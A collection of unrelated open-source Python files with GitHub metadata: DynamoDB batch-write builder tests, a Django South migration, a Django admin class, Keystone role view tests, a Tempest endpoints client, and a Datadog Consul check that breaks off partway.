self.assertEqual(
BatchWriteItem().payload,
{}
)
def test_return_consumed_capacity_none(self):
self.assertEqual(
BatchWriteItem().return_consumed_capacity_none().payload,
{
"ReturnConsumedCapacity": "NONE",
}
)
def test_return_consumed_capacity_indexes(self):
self.assertEqual(
BatchWriteItem().return_consumed_capacity_indexes().payload,
{
"ReturnConsumedCapacity": "INDEXES",
}
)
def test_return_consumed_capacity_total(self):
self.assertEqual(
BatchWriteItem().return_consumed_capacity_total().payload,
{
"ReturnConsumedCapacity": "TOTAL",
}
)
def test_return_item_collection_metrics_none(self):
self.assertEqual(
BatchWriteItem().return_item_collection_metrics_none().payload,
{
"ReturnItemCollectionMetrics": "NONE",
}
)
def test_return_item_collection_metrics_size(self):
self.assertEqual(
BatchWriteItem().return_item_collection_metrics_size().payload,
{
"ReturnItemCollectionMetrics": "SIZE",
}
)
def test_table(self):
self.assertEqual(
BatchWriteItem().table("Table").payload,
{
"RequestItems": {
"Table": [
],
},
}
)
def test_constuctor_with_table(self):
self.assertEqual(
BatchWriteItem("Table").delete({"hash": u"h1"}).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
],
},
}
)
def test_constuctor_with_table_and_delete(self):
self.assertEqual(
BatchWriteItem("Table", delete=[{"hash": u"h1"}]).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
],
},
}
)
def test_constuctor_with_table_and_put(self):
self.assertEqual(
BatchWriteItem("Table", put=[{"hash": u"h1"}]).payload,
{
"RequestItems": {
"Table": [
{"PutRequest": {"Item": {"hash": {"S": "h1"}}}},
],
},
}
)
def test_table_with_delete(self):
self.assertEqual(
BatchWriteItem().table("Table", delete=[{"hash": u"h1"}, {"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
{"DeleteRequest": {"Key": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_table_with_delete_twice(self):
self.assertEqual(
BatchWriteItem().table("Table", delete=[{"hash": u"h1"}]).table("Table", delete=[{"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
{"DeleteRequest": {"Key": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_table_with_put(self):
self.assertEqual(
BatchWriteItem().table("Table", put=[{"hash": u"h1"}, {"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"PutRequest": {"Item": {"hash": {"S": "h1"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_table_with_put_twice(self):
self.assertEqual(
BatchWriteItem().table("Table", put=[{"hash": u"h1"}]).table("Table", put=[{"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"PutRequest": {"Item": {"hash": {"S": "h1"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_delete(self):
self.assertEqual(
BatchWriteItem().table("Table").delete({"hash": u"h1"}).table("Table").delete([{"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
{"DeleteRequest": {"Key": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_put(self):
self.assertEqual(
BatchWriteItem().table("Table").put({"hash": u"h1"}, [{"hash": u"h2"}]).payload,
{
"RequestItems": {
"Table": [
{"PutRequest": {"Item": {"hash": {"S": "h1"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_alternate_between_tables_and_put_delete(self):
self.assertEqual(
BatchWriteItem()
.table("Table1").delete({"hash": u"h1"})
.table("Table2").put([{"hash": u"h2"}])
.table("Table1").put({"hash": u"h11"})
.table("Table2").delete({"hash": u"h22"})
.payload,
{
"RequestItems": {
"Table1": [
{"DeleteRequest": {"Key": {"hash": {"S": "h1"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h11"}}}},
],
"Table2": [
{"DeleteRequest": {"Key": {"hash": {"S": "h22"}}}},
{"PutRequest": {"Item": {"hash": {"S": "h2"}}}},
],
},
}
)
def test_put_without_active_table(self):
with self.assertRaises(_lv.BuilderError) as catcher:
BatchWriteItem().put({"h": 0})
self.assertEqual(catcher.exception.args, ("No active table.",))
def test_delete_without_active_table(self):
with self.assertRaises(_lv.BuilderError) as catcher:
BatchWriteItem().delete({"h": 0})
self.assertEqual(catcher.exception.args, ("No active table.",))
class BatchWriteItemResponseUnitTests(_tst.UnitTests):
def test_all_none(self):
r = BatchWriteItemResponse()
self.assertIsNone(r.consumed_capacity)
self.assertIsNone(r.item_collection_metrics)
self.assertIsNone(r.unprocessed_items)
def test_all_set(self):
unprocessed_items = object()
r = BatchWriteItemResponse(ConsumedCapacity=[{}], ItemCollectionMetrics={"A": [{}]}, UnprocessedItems=unprocessed_items)
self.assertIsInstance(r.consumed_capacity[0], ConsumedCapacity)
self.assertIsInstance(r.item_collection_metrics["A"][0], ItemCollectionMetrics)
self.assertIs(r.unprocessed_items, unprocessed_items)
| {
"content_hash": "a2861811844384b6641a112f3ca4d880",
"timestamp": "",
"source": "github",
"line_count": 491,
"max_line_length": 173,
"avg_line_length": 34.77393075356415,
"alnum_prop": 0.5197961813283355,
"repo_name": "jacquev6/LowVoltage",
"id": "f8a99dce11d7c1a7414ee4176bf7ebc3ce16f3c5",
"size": "17159",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "LowVoltage/actions/batch_write_item.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "396929"
},
{
"name": "Shell",
"bytes": "553"
}
],
"symlink_target": ""
} |
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'UserProfile.can_create'
db.add_column('website_userprofile', 'can_create',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Deleting field 'UserProfile.can_create'
db.delete_column('website_userprofile', 'can_create')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'website.country': {
'Meta': {'object_name': 'Country'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
'website.credentialsmodel': {
'Meta': {'object_name': 'CredentialsModel'},
'credential': ('oauth2client.django_orm.CredentialsField', [], {'null': 'True'}),
'id': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'primary_key': 'True'})
},
'website.field': {
'Meta': {'object_name': 'Field'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'website.hub': {
'Meta': {'object_name': 'Hub'},
'is_displayed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_live': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'moderator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderator'", 'null': 'True', 'to': "orm['auth.User']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'primary_key': 'True'})
},
'website.hubpermissions': {
'Meta': {'object_name': 'HubPermissions'},
'allowed_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'allowed_user'", 'unique': 'True', 'to': "orm['auth.User']"}),
'hub': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'hub'", 'primary_key': 'True', 'to': "orm['website.Hub']"})
},
'website.notetakingbuddy': {
'Meta': {'unique_together': "(('hub', 'user'),)", 'object_name': 'NoteTakingBuddy'},
'augmented_documents': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'behavior': ('django.db.models.fields.CharField', [], {'max_length': '22'}),
'hub': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Hub']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'live_session': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'note_taking_format': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'passionated_by_subject': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'score': ('django.db.models.fields.IntegerField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'website.organization': {
'Meta': {'object_name': 'Organization'},
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Country']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'members_role': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'website.training': {
'Meta': {'object_name': 'Training'},
'cowriters': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'cowriters'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'creator'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_displayed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_live': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_updated': ('django.db.models.fields.IntegerField', [], {'default': '1327217400'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'participants'", 'symmetrical': 'False', 'to': "orm['auth.User']"}),
'resource_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'db_index': 'True'}),
'total_views': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'total_views_open25': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'website.trainingparticipation': {
'Meta': {'object_name': 'TrainingParticipation'},
'count': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'training': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Training']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'website.trainingschedule': {
'Meta': {'object_name': 'TrainingSchedule'},
'event_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start_time': ('django.db.models.fields.DateTimeField', [], {}),
'training': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Training']"})
},
'website.trainingtempshare': {
'Meta': {'object_name': 'TrainingTempShare'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'facebook_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 9, 27, 0, 0)'}),
'role': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'training': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Training']"}),
'user_invited': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_invited'", 'null': 'True', 'to': "orm['auth.User']"}),
'user_who_invites': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_who_invites'", 'null': 'True', 'to': "orm['auth.User']"})
},
'website.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'about_me': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'can_create': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'drive_folder_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'enable_notifications': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'facebook_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
'facebook_profile_url': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'isUniStar': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_email_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_organization_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_student': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'last_activity_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'linkedin_profile_url': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'organization': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['website.Organization']", 'null': 'True'}),
'twitter_profile_url': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'}),
'website_url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['website'] | {
"content_hash": "f183c9de07bc4198875fb1c6094846ab",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 182,
"avg_line_length": 74.3625730994152,
"alnum_prop": 0.5518244731047499,
"repo_name": "UniShared/unishared",
"id": "f2d794ca48b4d4cda3f7a98b8bd9babc3f28cf71",
"size": "12740",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "UniShared_python/website/migrations/0022_auto__add_field_userprofile_can_create.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4964"
},
{
"name": "JavaScript",
"bytes": "647537"
},
{
"name": "Python",
"bytes": "440660"
}
],
"symlink_target": ""
} |
import reversion
from django.contrib import admin
from base.admin import (MediaRemovalAdminMixin, DownloadMediaFilesMixin,
RestrictedCompetitionAdminMixin)
from .models import Leaflet
class LeafletAdmin(RestrictedCompetitionAdminMixin,
MediaRemovalAdminMixin,
DownloadMediaFilesMixin,
reversion.VersionAdmin):
list_display = (
'competition',
'year',
'issue',
)
list_filter = (
'competition',
)
search_fields = (
'competition__name',
'year',
'issue',
)
raw_id_fields = ('competition',)
# define the autocomplete_lookup_fields
autocomplete_lookup_fields = {
'fk': ['competition'],
}
fieldsets = (
(None, {
'fields': ('competition', 'year', 'issue', 'leaflet')
}),
)
editonly_fieldsets = (
('Details', {
'classes': ('grp-collapse', 'grp-closed'),
'fields': ('added_by', 'added_at', 'modified_by', 'modified_at')
}),
)
# Register to the admin site
admin.site.register(Leaflet, LeafletAdmin)
| {
"content_hash": "30dc816752ea31cf588c3f9a549102e5",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 76,
"avg_line_length": 21.29090909090909,
"alnum_prop": 0.5550811272416738,
"repo_name": "tbabej/roots",
"id": "ede63596afa3334f8adf6006d59155d76566ee90",
"size": "1171",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "leaflets/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "912"
},
{
"name": "HTML",
"bytes": "94535"
},
{
"name": "JavaScript",
"bytes": "16550"
},
{
"name": "Python",
"bytes": "274597"
},
{
"name": "TeX",
"bytes": "2163"
}
],
"symlink_target": ""
} |
import json
from unittest import TestCase
from unittest.mock import patch
from identity.views import (
ListUserRoleView, AddUserRoleView, DeleteUserRoleView)
from identity.tests.fakes import FakeToken, FakeResource
from vault.tests.fakes import fake_request, UserFactory
class BaseAjaxTestCase(TestCase):
view_class = None
def setUp(self):
self.view = self.view_class.as_view()
self.request = fake_request(method='POST')
self.request.user.token = FakeToken
self.request.user.is_superuser = True
patch('identity.keystone.Keystone._create_keystone_connection').start()
patch('identity.views.log').start()
def tearDown(self):
patch.stopall()
class TestListUserRole(BaseAjaxTestCase):
view_class = ListUserRoleView
def setUp(self):
super(TestListUserRole, self).setUp()
self.mock_user_list = patch(
'identity.keystone.Keystone.user_list').start()
def test_list_user_role_needs_authentication(self):
req = fake_request(method='POST', user=False)
response = self.view(req)
self.assertEqual(response.status_code, 302)
def test_list_user_role_need_to_be_superuser(self):
self.request.user.is_superuser = False
response = self.view(self.request)
msgs = [msg for msg in self.request._messages]
self.assertGreater(len(msgs), 0)
self.assertEqual(response.status_code, 302)
def test_list_user_role_response_content_is_json(self):
response = self.view(self.request)
self.assertEqual(response._headers.get(
'content-type')[1], 'application/json')
@patch('identity.views.ListUserRoleView.get_user_roles')
def test_list_user_role_return_sorted_users(self, mock_get_user_roles):
user1 = FakeResource(1)
user1.name = 'ZZZ'
user2 = FakeResource(2)
user2.name = 'BBBB'
user3 = FakeResource(3)
user3.name = 'LLLL'
self.mock_user_list.return_value = [user1, user2, user3]
mock_get_user_roles.return_value = []
post = self.request.POST.copy()
post.update({'project': 1})
self.request.POST = post
response = self.view(self.request)
computed = json.loads(response.content)
computed_names = [x.get('username') for x in computed.get('users')]
expected = sorted([user1.name, user2.name, user3.name])
self.assertEqual(computed_names, expected)
def test_user_list_was_called(self):
post = self.request.POST.copy()
post.update({'project': 1})
self.request.POST = post
self.view(self.request)
self.mock_user_list.assert_called_with(project_id=1)
@patch('identity.views.ListUserRoleView.get_user_roles')
def test_get_user_roles_was_called(self, mock_get_user_roles):
user = FakeResource(1)
user.username = 'User1'
self.mock_user_list.return_value = [user]
mock_get_user_roles.return_value = []
post = self.request.POST.copy()
post.update({'project': 1})
self.request.POST = post
self.view(self.request)
mock_get_user_roles.assert_called_with(user, 1)
@patch('identity.views.ListUserRoleView.get_user_roles')
def test_get_user_roles_exception(self, mock_get_user_roles):
mock_get_user_roles.side_effect = Exception()
mock_get_user_roles.return_value = []
user = FakeResource(1)
user.username = 'User1'
self.mock_user_list.return_value = [user]
post = self.request.POST.copy()
post.update({'project': 1})
self.request.POST = post
response = self.view(self.request)
self.assertEqual(response.status_code, 500)
class TestAddUserRole(BaseAjaxTestCase):
view_class = AddUserRoleView
def test_add_user_role_needs_authentication(self):
req = fake_request(method='POST', user=False)
self.request.user.token = None
response = self.view(req)
self.assertEqual(response.status_code, 302)
def test_add_user_role_need_to_be_superuser(self):
self.request.user.is_superuser = False
response = self.view(self.request)
msgs = [msg for msg in self.request._messages]
self.assertGreater(len(msgs), 0)
self.assertEqual(response.status_code, 302)
@patch('identity.keystone.Keystone.add_user_role')
def test_add_user_role_response_content_is_json(self, mock_add_user_role):
response = self.view(self.request)
self.assertEqual(response._headers.get(
'content-type')[1], 'application/json')
@patch('identity.keystone.Keystone.add_user_role')
def test_add_user_role_was_called(self, mock_add_user_role):
post = self.request.POST.copy()
post.update({'project': 1, 'role': 1, 'user': 1})
self.request.POST = post
self.view(self.request)
mock_add_user_role.assert_called_with(project=1, role=1, user=1)
@patch('identity.keystone.Keystone.add_user_role')
def test_add_user_role_exception(self, mock_add_user_role):
mock_add_user_role.side_effect = Exception()
response = self.view(self.request)
self.assertEqual(response.status_code, 500)
class TestDeleteUserRole(BaseAjaxTestCase):
view_class = DeleteUserRoleView
def test_delete_user_role_needs_authentication(self):
req = fake_request(method='POST', user=False)
self.request.user.token = None
response = self.view(req)
self.assertEqual(response.status_code, 302)
def test_delete_user_role_need_to_be_superuser(self):
self.request.user.is_superuser = False
response = self.view(self.request)
msgs = [msg for msg in self.request._messages]
self.assertGreater(len(msgs), 0)
self.assertEqual(response.status_code, 302)
@patch('identity.keystone.Keystone.remove_user_role')
def test_delete_user_role_response_content_is_json(self, mock_remove_user_role):
response = self.view(self.request)
self.assertEqual(response._headers.get(
'content-type')[1], 'application/json')
@patch('identity.keystone.Keystone.remove_user_role')
def test_remove_user_role_was_called(self, mock_remove_user_role):
post = self.request.POST.copy()
post.update({'project': 1, 'role': 1, 'user': 1})
self.request.POST = post
self.view(self.request)
mock_remove_user_role.assert_called_with(project=1, role=1, user=1)
@patch('identity.keystone.Keystone.remove_user_role')
def test_remove_user_role_exception(self, mock_remove_user_role):
mock_remove_user_role.side_effect = Exception()
response = self.view(self.request)
self.assertEqual(response.status_code, 500)
| {
"content_hash": "7d8ea2d15393560c555811375e58e035",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 84,
"avg_line_length": 31.86046511627907,
"alnum_prop": 0.6525547445255474,
"repo_name": "globocom/vault",
"id": "192de7fec9cb200b4ed873d31b806574eba6f860",
"size": "6874",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "identity/tests/test_ajax_views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "32751"
},
{
"name": "Dockerfile",
"bytes": "4161"
},
{
"name": "HTML",
"bytes": "108576"
},
{
"name": "JavaScript",
"bytes": "77548"
},
{
"name": "Makefile",
"bytes": "2301"
},
{
"name": "Python",
"bytes": "363186"
},
{
"name": "Shell",
"bytes": "7361"
}
],
"symlink_target": ""
} |
import json
import urlparse
from tempest.common.rest_client import RestClient
class EndPointClientJSON(RestClient):
def __init__(self, config, username, password, auth_url, tenant_name=None):
super(EndPointClientJSON, self).__init__(config,
username, password,
auth_url, tenant_name)
self.service = self.config.identity.catalog_type
self.endpoint_url = 'adminURL'
def request(self, method, url, headers=None, body=None, wait=None):
"""Overriding the existing HTTP request in super class rest_client."""
self._set_auth()
self.base_url = self.base_url.replace(
urlparse.urlparse(self.base_url).path, "/v3")
return super(EndPointClientJSON, self).request(method, url,
headers=headers,
body=body)
def list_endpoints(self):
"""GET endpoints."""
resp, body = self.get('endpoints')
body = json.loads(body)
return resp, body['endpoints']
def create_endpoint(self, service_id, interface, url, **kwargs):
"""Create endpoint."""
region = kwargs.get('region', None)
enabled = kwargs.get('enabled', None)
post_body = {
'service_id': service_id,
'interface': interface,
'url': url,
'region': region,
'enabled': enabled
}
post_body = json.dumps({'endpoint': post_body})
resp, body = self.post('endpoints', post_body, self.headers)
body = json.loads(body)
return resp, body['endpoint']
def update_endpoint(self, endpoint_id, service_id=None, interface=None,
url=None, region=None, enabled=None):
"""Updates an endpoint with given parameters."""
post_body = {}
if service_id is not None:
post_body['service_id'] = service_id
if interface is not None:
post_body['interface'] = interface
if url is not None:
post_body['url'] = url
if region is not None:
post_body['region'] = region
if enabled is not None:
post_body['enabled'] = enabled
post_body = json.dumps({'endpoint': post_body})
resp, body = self.patch('endpoints/%s' % endpoint_id, post_body,
self.headers)
body = json.loads(body)
return resp, body['endpoint']
def delete_endpoint(self, endpoint_id):
"""Delete endpoint."""
resp_header, resp_body = self.delete('endpoints/%s' % endpoint_id)
return resp_header, resp_body
| {
"content_hash": "9cf92bd8c8224503f7c31056a300d821",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 79,
"avg_line_length": 39.44285714285714,
"alnum_prop": 0.5461789206809127,
"repo_name": "eltonkevani/tempest_el_env",
"id": "cf26d0a1e4aa5e096abb64d71dbc0c1c0c60425c",
"size": "3443",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tempest/services/identity/v3/json/endpoints_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1871339"
},
{
"name": "Shell",
"bytes": "5748"
}
],
"symlink_target": ""
} |
from collections import defaultdict
from datetime import datetime, timedelta
from itertools import islice
from math import ceil, floor, sqrt
from urlparse import urljoin
# project
from checks import AgentCheck
from utils.containers import hash_mutable
# 3p
import requests
# More information in https://www.consul.io/docs/internals/coordinates.html,
# code is based on the snippet there.
def distance(a, b):
a = a['Coord']
b = b['Coord']
total = 0
b_vec = b['Vec']
for i, a_p in enumerate(a['Vec']):
diff = a_p - b_vec[i]
total += diff * diff
rtt = sqrt(total) + a['Height'] + b['Height']
adjusted = rtt + a['Adjustment'] + b['Adjustment']
if adjusted > 0.0:
rtt = adjusted
return rtt * 1000.0
def ceili(v):
return int(ceil(v))
class ConsulCheckInstanceState(object):
def __init__(self):
self.local_config = None
self.last_config_fetch_time = None
self.last_known_leader = None
class ConsulCheck(AgentCheck):
CONSUL_CHECK = 'consul.up'
HEALTH_CHECK = 'consul.check'
CONSUL_CATALOG_CHECK = 'consul.catalog'
SOURCE_TYPE_NAME = 'consul'
MAX_CONFIG_TTL = 300 # seconds
MAX_SERVICES = 50 # cap on distinct Consul ServiceIDs to interrogate
STATUS_SC = {
'up': AgentCheck.OK,
'passing': AgentCheck.OK,
'warning': AgentCheck.WARNING,
'critical': AgentCheck.CRITICAL,
}
STATUS_SEVERITY = {
AgentCheck.UNKNOWN: 0,
AgentCheck.OK: 1,
AgentCheck.WARNING: 2,
AgentCheck.CRITICAL: 3,
}
def __init__(self, name, init_config, agentConfig, instances=None):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
self._instance_states = defaultdict(lambda: ConsulCheckInstanceState())
def consul_request(self, instance, endpoint):
url = urljoin(instance.get('url'), endpoint)
try:
clientcertfile = instance.get('client_cert_file', self.init_config.get('client_cert_file', False))
privatekeyfile = instance.get('private_key_file', self.init_config.get('private_key_file', False))
cabundlefile = instance.get('ca_bundle_file', self.init_config.get('ca_bundle_file', True))
acl_token = instance.get('acl_token', None)
headers = {}
if acl_token:
headers['X-Consul-Token'] = acl_token
if clientcertfile:
if privatekeyfile:
resp = requests.get(url, cert=(clientcertfile,privatekeyfile), verify=cabundlefile, headers=headers)
else:
resp = requests.get(url, cert=clientcertfile, verify=cabundlefile, headers=headers)
else:
resp = requests.get(url, verify=cabundlefile, headers=headers)
except requests.exceptions.Timeout:
self.log.exception('Consul request to {0} timed out'.format(url))
raise
resp.raise_for_status()
return resp.json()
### Consul Config Accessors
def _get_local_config(self, instance, instance_state):
if not instance_state.local_config or datetime.now() - instance_state.last_config_fetch_time > timedelta(seconds=self.MAX_CONFIG_TTL):
instance_state.local_config = self.consul_request(instance, '/v1/agent/self')
instance_state.last_config_fetch_time = datetime.now()
return instance_state.local_config
def _get_cluster_leader(self, instance):
return self.consul_request(instance, '/v1/status/leader')
def _get_agent_url(self, instance, instance_state):
self.log.debug("Starting _get_agent_url")
local_config = self._get_local_config(instance, instance_state)
agent_addr = local_config.get('Config', {}).get('AdvertiseAddr')
agent_port = local_config.get('Config', {}).get('Ports', {}).get('Server')
agent_url = "{0}:{1}".format(agent_addr, agent_port)
self.log.debug("Agent url is %s" % agent_url)
return agent_url
def _get_agent_datacenter(self, instance, instance_state):
local_config = self._get_local_config(instance, instance_state)
agent_dc = local_config.get('Config', {}).get('Datacenter')
return agent_dc
### Consul Leader Checks
def _is_instance_leader(self, instance, instance_state):
try:
agent_url = self._get_agent_url(instance, instance_state)
leader = instance_state.last_known_leader or self._get_cluster_leader(instance)
self.log.debug("Consul agent lives at %s . Consul Leader lives at %s" % (agent_url,leader))
return agent_url == leader
except Exception:
return False
def _check_for_leader_change(self, instance, instance_state):
perform_new_leader_checks = instance.get('new_leader_checks',
self.init_config.get('new_leader_checks', False))
perform_self_leader_check = instance.get('self_leader_check',
self.init_config.get('self_leader_check', False))
if perform_new_leader_checks and perform_self_leader_check:
self.log.warn('Both perform_self_leader_check and perform_new_leader_checks are set, '
'ignoring perform_new_leader_checks')
elif not perform_new_leader_checks and not perform_self_leader_check:
# Nothing to do here
return
leader = self._get_cluster_leader(instance)
if not leader:
# A few things could be happening here.
# 1. Consul Agent is Down
# 2. The cluster is in the midst of a leader election
